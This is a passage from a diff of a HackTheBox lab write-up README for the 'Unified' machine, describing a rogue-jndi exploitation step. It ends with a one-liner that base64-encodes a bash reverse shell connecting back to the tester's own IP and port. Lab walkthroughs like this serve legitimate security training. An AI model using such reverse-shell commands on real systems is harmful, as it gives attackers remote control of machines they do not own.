szmpns/HackTheBox-Writeups/Starting Point/Tier 2/Unified/README.md

 ![rogue-jndi](./Screenshots/unifiedjndi2.png)

 After compiling the JAR file, we'll need to create a command to send the `reverse shell`.
-Since this system doesn't have `Netcat` by default, we'll need to craft a `reverse shell command` and then encode it in `Base64`.
+We'll need to craft a `reverse shell command` and then encode it in `Base64`.
 Use the provided one-liner to do this:

 ```
 echo 'bash -c bash -i >&/dev/tcp/{your tun0 ip}/{port of your choice} 0>&1' | base64